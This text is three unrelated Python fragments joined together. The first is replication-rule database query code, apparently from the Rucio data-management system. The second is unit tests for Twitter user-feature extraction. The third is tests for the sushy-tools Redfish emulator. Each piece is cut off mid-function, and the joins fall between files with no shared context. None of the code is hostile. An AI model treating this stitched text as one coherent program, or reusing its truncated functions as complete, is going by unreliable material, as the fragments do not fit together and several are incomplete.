# Add an updated_col_rep
if did.did_type == DIDType.DATASET:
models.UpdatedCollectionReplica(scope=scope,
name=name,
did_type=did.did_type).save(session=session)
@read_session
def get_updated_dids(total_workers, worker_number, limit=100, blocked_dids=[], session=None):
"""
Get updated dids.
:param total_workers: Number of total workers.
:param worker_number: id of the executing worker.
:param limit: Maximum number of dids to return.
:param blocked_dids: Blocked dids to filter.
:param session: Database session in use.
"""
query = session.query(models.UpdatedDID.id,
models.UpdatedDID.scope,
models.UpdatedDID.name,
models.UpdatedDID.rule_evaluation_action)
query = filter_thread_work(session=session, query=query, total_threads=total_workers, thread_id=worker_number, hash_variable='name')
# Remove blocked dids from query, but only do the first 30 ones, not to overload the query
if blocked_dids:
chunk = list(chunks(blocked_dids, 30))[0]
query = query.filter(tuple_(models.UpdatedDID.scope, models.UpdatedDID.name).notin_(chunk))
if limit:
fetched_dids = query.order_by(models.UpdatedDID.created_at).limit(limit).all()
filtered_dids = [did for did in fetched_dids if (did.scope, did.name) not in blocked_dids]
if len(fetched_dids) == limit and not filtered_dids:
return get_updated_dids(total_workers=total_workers,
worker_number=worker_number,
limit=None,
blocked_dids=blocked_dids,
session=session)
else:
return filtered_dids
else:
return [did for did in query.order_by(models.UpdatedDID.created_at).all() if (did.scope, did.name) not in blocked_dids]
@read_session
def get_rules_beyond_eol(date_check, worker_number, total_workers, session):
"""
Get rules which have eol_at before a certain date.
:param date_check: The reference date that should be compared to eol_at.
:param worker_number: id of the executing worker.
:param total_workers: Number of total workers.
:param session: Database session in use.
"""
query = session.query(models.ReplicationRule.scope,
models.ReplicationRule.name,
models.ReplicationRule.rse_expression,
models.ReplicationRule.locked,
models.ReplicationRule.id,
models.ReplicationRule.eol_at,
models.ReplicationRule.expires_at,
models.ReplicationRule.account).\
filter(models.ReplicationRule.eol_at < date_check)
query = filter_thread_work(session=session, query=query, total_threads=total_workers, thread_id=worker_number, hash_variable='name')
return [rule for rule in query.all()]
@read_session
def get_expired_rules(total_workers, worker_number, limit=100, blocked_rules=[], session=None):
"""
Get expired rules.
:param total_workers: Number of total workers.
:param worker_number: id of the executing worker.
:param limit: Maximum number of rules to return.
:param blocked_rules: List of blocked rules.
:param session: Database session in use.
"""
query = session.query(models.ReplicationRule.id, models.ReplicationRule.rse_expression).filter(models.ReplicationRule.expires_at < datetime.utcnow(),
models.ReplicationRule.locked == false(),
models.ReplicationRule.child_rule_id == None).\
with_hint(models.ReplicationRule, "index(rules RULES_EXPIRES_AT_IDX)", 'oracle').\
order_by(models.ReplicationRule.expires_at) # NOQA
query = filter_thread_work(session=session, query=query, total_threads=total_workers, thread_id=worker_number, hash_variable='name')
if limit:
fetched_rules = query.limit(limit).all()
filtered_rules = [rule for rule in fetched_rules if rule[0] not in blocked_rules]
if len(fetched_rules) == limit and not filtered_rules:
return get_expired_rules(total_workers=total_workers,
worker_number=worker_number,
limit=None,
blocked_rules=blocked_rules,
session=session)
else:
return filtered_rules
else:
return [rule for rule in query.all() if rule[0] not in blocked_rules]
@read_session
def get_injected_rules(total_workers, worker_number, limit=100, blocked_rules=[], session=None):
"""
Get rules to be injected.
:param total_workers: Number of total workers.
:param worker_number: id of the executing worker.
:param limit: Maximum number of rules to return.
:param blocked_rules: Blocked rules not to include.
:param session: Database session in use.
"""
if session.bind.dialect.name == 'oracle':
query = session.query(models.ReplicationRule.id).\
with_hint(models.ReplicationRule, "index(rules RULES_INJECTIONSTATE_IDX)", 'oracle').\
filter(text("(CASE when rules.state='I' THEN rules.state ELSE null END)= 'I' ")).\
filter(models.ReplicationRule.state == RuleState.INJECT).\
order_by(models.ReplicationRule.created_at).\
filter(models.ReplicationRule.created_at <= datetime.utcnow())
else:
query = session.query(models.ReplicationRule.id).\
with_hint(models.ReplicationRule, "index(rules RULES_INJECTIONSTATE_IDX)", 'oracle').\
filter(models.ReplicationRule.state == RuleState.INJECT).\
order_by(models.ReplicationRule.created_at).\
filter(models.ReplicationRule.created_at <= datetime.utcnow())
query = filter_thread_work(session=session, query=query, total_threads=total_workers, thread_id=worker_number, hash_variable='name')
if limit:
fetched_rules = query.limit(limit).all()
filtered_rules = [rule for rule in fetched_rules if rule[0] not in blocked_rules]
if len(fetched_rules) == limit and not filtered_rules:
return get_injected_rules(total_workers=total_workers,
worker_number=worker_number,
limit=None,
blocked_rules=blocked_rules,
session=session)
else:
return filtered_rules
else:
return [rule for rule in query.all() if rule[0] not in blocked_rules]
@read_session
def get_stuck_rules(total_workers, worker_number, delta=600, limit=10, blocked_rules=[], session=None):
"""
Get stuck rules.
:param total_workers: Number of total workers.
:param worker_number: id of the executing worker.
:param delta: Delta in seconds to select rules in.
:param limit: Maximum number of rules to select.
:param blocked_rules: Blocked rules to filter out.
:param session: Database session in use.
"""
if session.bind.dialect.name == 'oracle':
query = session.query(models.ReplicationRule.id).\
with_hint(models.ReplicationRule, "index(rules RULES_STUCKSTATE_IDX)", 'oracle').\
filter(text("(CASE when rules.state='S' THEN rules.state ELSE null END)= 'S' ")).\
filter(models.ReplicationRule.state == RuleState.STUCK).\
filter(models.ReplicationRule.updated_at < datetime.utcnow() - timedelta(seconds=delta)).\
filter(or_(models.ReplicationRule.expires_at == null(),
models.ReplicationRule.expires_at > datetime.utcnow(),
models.ReplicationRule.locked == true())).\
order_by(models.ReplicationRule.updated_at) # NOQA
else:
query = session.query(models.ReplicationRule.id).\
with_hint(models.ReplicationRule, "index(rules RULES_STUCKSTATE_IDX)", 'oracle').\
filter(models.ReplicationRule.state == RuleState.STUCK).\
filter(models.ReplicationRule.updated_at < datetime.utcnow() - timedelta(seconds=delta)).\
filter(or_(models.ReplicationRule.expires_at == null(),
models.ReplicationRule.expires_at > datetime.utcnow(),
models.ReplicationRule.locked == true())).\
order_by(models.ReplicationRule.updated_at)
query = filter_thread_work(session=session, query=query, total_threads=total_workers, thread_id=worker_number, hash_variable='name')
if limit:
fetched_rules = query.limit(limit).all()
filtered_rules = [rule for rule in fetched_rules if rule[0] not in blocked_rules]
if len(fetched_rules) == limit and not filtered_rules:
return get_stuck_rules(total_workers=total_workers,
worker_number=worker_number,
delta=delta,
limit=None,
blocked_rules=blocked_rules,
session=session)
else:
return filtered_rules
else:
return [rule for rule in query.all() if rule[0] not in blocked_rules]
@transactional_session
def delete_updated_did(id_, session=None):
"""
Delete an updated_did by id.
:param id_: Id of the row not to delete.
:param session: The database session in use.
"""
session.query(models.UpdatedDID).filter(models.UpdatedDID.id == id_).delete()
@transactional_session
def update_rules_for_lost_replica(scope, name, rse_id, nowait=False, session=None, logger=logging.log):
"""
Update rules if a file replica is lost.
:param scope: Scope of the replica.
:param name: Name of the replica.
:param rse_id: RSE id of the replica.
:param nowait: Nowait parameter for the FOR UPDATE statement.
:param session: The database session in use.
:param logger: Optional decorated logger that can be passed from the calling daemons or servers.
"""
locks = session.query(models.ReplicaLock).filter(models.ReplicaLock.scope == scope, models.ReplicaLock.name == name, models.ReplicaLock.rse_id == rse_id).with_for_update(nowait=nowait).all()
replica = session.query(models.RSEFileAssociation).filter(models.RSEFileAssociation.scope == scope, models.RSEFileAssociation.name == name, models.RSEFileAssociation.rse_id == rse_id).with_for_update(nowait=nowait).one()
requests = session.query(models.Request).filter(models.Request.scope == scope, | |
= User.parse(api=None, json=user_dic)
user_features = UserFeatures(user, [])
self.assertTrue(np.isnan(user_features[USER_FEATURES_INDEX["number_of_different_countries"]]))
def test_number_of_different_countries(self):
user_dic = {
"id": 1,
"name": "<NAME>",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
tweets = [
Status.parse(api=None, json={
"id": 0,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": {
"country_code": "DE",
"name": "Berlin"
},
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 1,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": {
"country_code": "DE",
"name": "Berlin"
},
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 2,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": {
"country_code": "EN",
"name": "London"
},
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
})
]
user_features = UserFeatures(user, tweets)
self.assertEqual(user_features[USER_FEATURES_INDEX["number_of_different_countries"]], 2.0)
def test_country_with_most_tweets_nan(self):
user_dic = {
"id": 1,
"name": "Test Account",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
user_features = UserFeatures(user, [])
self.assertTrue(np.isnan(user_features[USER_FEATURES_INDEX["country_with_most_tweets"]]))
def test_country_with_most_tweets(self):
user_dic = {
"id": 1,
"name": "<NAME>",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
tweets = [
Status.parse(api=None, json={
"id": 0,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": {
"country_code": "DE",
"name": "Berlin"
},
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 1,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": {
"country_code": "DE",
"name": "Berlin"
},
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 2,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": {
"country_code": "EN",
"name": "London"
},
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
})
]
user_features = UserFeatures(user, tweets)
self.assertEqual(user_features[USER_FEATURES_INDEX["country_with_most_tweets"]], COUNTRY_CODES_IDX["DE"])
def test_number_of_different_sources_nan(self):
user_dic = {
"id": 1,
"name": "Test Account",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
user_features = UserFeatures(user, [])
self.assertTrue(np.isnan(user_features[USER_FEATURES_INDEX["number_of_different_sources"]]))
def test_number_of_different_sources(self):
user_dic = {
"id": 1,
"name": "Test Account",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
tweets = [
Status.parse(api=None, json={
"id": 0,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": None,
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 1,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": None,
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 2,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": None,
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Android App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
})
]
user_features = UserFeatures(user, tweets)
self.assertEqual(user_features[USER_FEATURES_INDEX["number_of_different_sources"]], 2.0)
def test_most_used_source_nan(self):
user_dic = {
"id": 1,
"name": "<NAME>",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
user_features = UserFeatures(user, [])
self.assertTrue(np.isnan(user_features[USER_FEATURES_INDEX["most_used_source"]]))
def test_most_used_source(self):
user_dic = {
"id": 1,
"name": "Test Account",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
tweets = [
Status.parse(api=None, json={
"id": 0,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": None,
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 1,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": None,
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 2,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": None,
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Android App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
})
]
user_features = UserFeatures(user, tweets)
self.assertEqual(user_features[USER_FEATURES_INDEX["most_used_source"]], TWEET_SOURCES_IDX["Twitter Web App"])
def test_retweet_tweets_mean_nan(self):
user_dic = {
"id": 1,
"name": "Test Account",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
user_features = UserFeatures(user, [])
self.assertTrue(np.isnan(user_features[USER_FEATURES_INDEX["retweet_tweets_mean"]]))
def test_retweet_tweets_mean(self):
user_dic = {
"id": 1,
"name": "Test Account",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": | |
<reponame>alexpilotti/sushy-tools
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from oslotest import base
from sushy_tools.emulator import main
from sushy_tools import error
def patch_resource(name):
def decorator(func):
return mock.patch.object(main.Application, name,
new_callable=mock.PropertyMock)(func)
return decorator
class EmulatorTestCase(base.BaseTestCase):
name = 'QEmu-fedora-i686'
uuid = 'c7a5fdbd-cdaf-9455-926a-d65c16db1809'
def setUp(self):
self.app = main.app.test_client()
super(EmulatorTestCase, self).setUp()
class CommonTestCase(EmulatorTestCase):
@patch_resource('systems')
def test_error(self, systems_mock):
systems_mock.return_value.get_power_state.side_effect = Exception(
'Fish is dead')
response = self.app.get('/redfish/v1/Systems/' + self.uuid)
self.assertEqual(500, response.status_code)
def test_root_resource(self):
response = self.app.get('/redfish/v1/')
self.assertEqual(200, response.status_code)
self.assertEqual('RedvirtService', response.json['Id'])
class ChassisTestCase(EmulatorTestCase):
@patch_resource('chassis')
def test_chassis_collection_resource(self, chassis_mock):
chassis_mock.return_value.chassis = ['chassis0', 'chassis1']
response = self.app.get('/redfish/v1/Chassis')
self.assertEqual(200, response.status_code)
self.assertEqual({'@odata.id': '/redfish/v1/Chassis/chassis0'},
response.json['Members'][0])
self.assertEqual({'@odata.id': '/redfish/v1/Chassis/chassis1'},
response.json['Members'][1])
@patch_resource('indicators')
@patch_resource('systems')
@patch_resource('managers')
@patch_resource('chassis')
def test_chassis_resource_get(self, chassis_mock, managers_mock,
systems_mock, indicators_mock):
chassis_mock = chassis_mock.return_value
chassis_mock.chassis = ['xxxx-yyyy-zzzz']
chassis_mock.uuid.return_value = 'xxxx-yyyy-zzzz'
chassis_mock.name.return_value = 'name'
managers_mock.return_value.managers = ['man1']
systems_mock.return_value.systems = ['sys1']
indicators_mock.return_value.get_indicator_state.return_value = 'Off'
response = self.app.get('/redfish/v1/Chassis/xxxx-yyyy-zzzz')
self.assertEqual(200, response.status_code)
self.assertEqual('xxxx-yyyy-zzzz', response.json['Id'])
self.assertEqual('xxxx-yyyy-zzzz', response.json['UUID'])
self.assertEqual('Off', response.json['IndicatorLED'])
self.assertEqual(
{'@odata.id': '/redfish/v1/Chassis/xxxx-yyyy-zzzz/Thermal'},
response.json['Thermal'])
self.assertEqual([{'@odata.id': '/redfish/v1/Systems/sys1'}],
response.json['Links']['ComputerSystems'])
self.assertEqual([{'@odata.id': '/redfish/v1/Managers/man1'}],
response.json['Links']['ManagedBy'])
self.assertEqual([{'@odata.id': '/redfish/v1/Managers/man1'}],
response.json['Links']['ManagersInChassis'])
@patch_resource('systems')
@patch_resource('chassis')
def test_chassis_thermal(self, chassis_mock, systems_mock):
chassis_mock = chassis_mock.return_value
chassis_mock.chassis = [self.uuid]
chassis_mock.uuid.return_value = self.uuid
systems_mock.return_value.systems = ['sys1']
response = self.app.get('/redfish/v1/Chassis/xxxx-yyyy-zzzz/Thermal')
self.assertEqual(200, response.status_code)
self.assertEqual('Thermal', response.json['Id'])
self.assertEqual(
'/redfish/v1/Chassis/xxxx-yyyy-zzzz/Thermal#/Temperatures/0',
response.json['Temperatures'][0]['@odata.id'])
self.assertEqual(
{'@odata.id': '/redfish/v1/Systems/sys1/Processors/CPU'},
response.json['Temperatures'][0]['RelatedItem'][0])
self.assertEqual(
'/redfish/v1/Chassis/xxxx-yyyy-zzzz/Thermal#/Fans/0',
response.json['Fans'][0]['@odata.id'])
self.assertEqual(
{'@odata.id': '/redfish/v1/Chassis/xxxx-yyyy-zzzz'},
response.json['Fans'][0]['RelatedItem'][0])
@patch_resource('indicators')
@patch_resource('chassis')
def test_chassis_indicator_set_ok(self, chassis_mock, indicators_mock):
chassis_mock.return_value.uuid.return_value = self.uuid
data = {'IndicatorLED': 'Off'}
response = self.app.patch('/redfish/v1/Chassis/xxxx-yyyy-zzzz',
json=data)
self.assertEqual(204, response.status_code)
set_indicator_state = indicators_mock.return_value.set_indicator_state
set_indicator_state.assert_called_once_with(self.uuid, 'Off')
@patch_resource('indicators')
@patch_resource('chassis')
def test_chassis_indicator_set_fail(self, chassis_mock, indicators_mock):
set_indicator_state = indicators_mock.return_value.set_indicator_state
set_indicator_state.side_effect = error.FishyError
data = {'IndicatorLED': 'Blah'}
response = self.app.patch('/redfish/v1/Chassis/xxxx-yyyy-zzzz',
json=data)
self.assertEqual(500, response.status_code)
class ManagersTestCase(EmulatorTestCase):
@patch_resource('managers')
def test_manager_collection_resource(self, managers_mock):
type(managers_mock.return_value).managers = mock.PropertyMock(
return_value=['bmc0', 'bmc1'])
response = self.app.get('/redfish/v1/Managers')
self.assertEqual(200, response.status_code)
self.assertEqual({'@odata.id': '/redfish/v1/Managers/bmc0'},
response.json['Members'][0])
self.assertEqual({'@odata.id': '/redfish/v1/Managers/bmc1'},
response.json['Members'][1])
@patch_resource('managers')
def test_manager_resource_get(self, managers_mock):
managers_mock = managers_mock.return_value
managers_mock.managers = ['xxxx-yyyy-zzzz']
managers_mock.get_manager.return_value = {
'UUID': 'xxxx-yyyy-zzzz',
'Name': 'name',
'Id': 'xxxx-yyyy-zzzz',
}
managers_mock.get_managed_systems.return_value = ['xxx']
managers_mock.get_managed_chassis.return_value = ['chassis0']
response = self.app.get('/redfish/v1/Managers/xxxx-yyyy-zzzz')
self.assertEqual(200, response.status_code, response.json)
self.assertEqual('xxxx-yyyy-zzzz', response.json['Id'])
self.assertEqual('xxxx-yyyy-zzzz', response.json['UUID'])
self.assertIsNone(response.json['ServiceEntryPointUUID'])
self.assertEqual([{'@odata.id': '/redfish/v1/Systems/xxx'}],
response.json['Links']['ManagerForServers'])
self.assertEqual([{'@odata.id': '/redfish/v1/Chassis/chassis0'}],
response.json['Links']['ManagerForChassis'])
class SystemsTestCase(EmulatorTestCase):
@patch_resource('systems')
def test_system_collection_resource(self, systems_mock):
type(systems_mock.return_value).systems = mock.PropertyMock(
return_value=['host0', 'host1'])
response = self.app.get('/redfish/v1/Systems')
self.assertEqual(200, response.status_code)
self.assertEqual({'@odata.id': '/redfish/v1/Systems/host0'},
response.json['Members'][0])
self.assertEqual({'@odata.id': '/redfish/v1/Systems/host1'},
response.json['Members'][1])
@patch_resource('indicators')
@patch_resource('chassis')
@patch_resource('managers')
@patch_resource('systems')
def test_system_resource_get(self, systems_mock, managers_mock,
chassis_mock, indicators_mock):
systems_mock = systems_mock.return_value
systems_mock.uuid.return_value = 'zzzz-yyyy-xxxx'
systems_mock.get_power_state.return_value = 'On'
systems_mock.get_total_memory.return_value = 1
systems_mock.get_total_cpus.return_value = 2
systems_mock.get_boot_device.return_value = 'Cd'
systems_mock.get_boot_mode.return_value = 'Legacy'
managers_mock.return_value.get_managers_for_system.return_value = [
'aaaa-bbbb-cccc']
chassis_mock.return_value.chassis = ['chassis0']
indicators_mock.return_value.get_indicator_state.return_value = 'Off'
response = self.app.get('/redfish/v1/Systems/xxxx-yyyy-zzzz')
self.assertEqual(200, response.status_code)
self.assertEqual('xxxx-yyyy-zzzz', response.json['Id'])
self.assertEqual('zzzz-yyyy-xxxx', response.json['UUID'])
self.assertEqual('On', response.json['PowerState'])
self.assertEqual('Off', response.json['IndicatorLED'])
self.assertEqual(
1, response.json['MemorySummary']['TotalSystemMemoryGiB'])
self.assertEqual(2, response.json['ProcessorSummary']['Count'])
self.assertEqual(
'Cd', response.json['Boot']['BootSourceOverrideTarget'])
self.assertEqual(
'Legacy', response.json['Boot']['BootSourceOverrideMode'])
self.assertEqual(
[{'@odata.id': '/redfish/v1/Managers/aaaa-bbbb-cccc'}],
response.json['Links']['ManagedBy'])
self.assertEqual(
[{'@odata.id': '/redfish/v1/Chassis/chassis0'}],
response.json['Links']['Chassis'])
@patch_resource('systems')
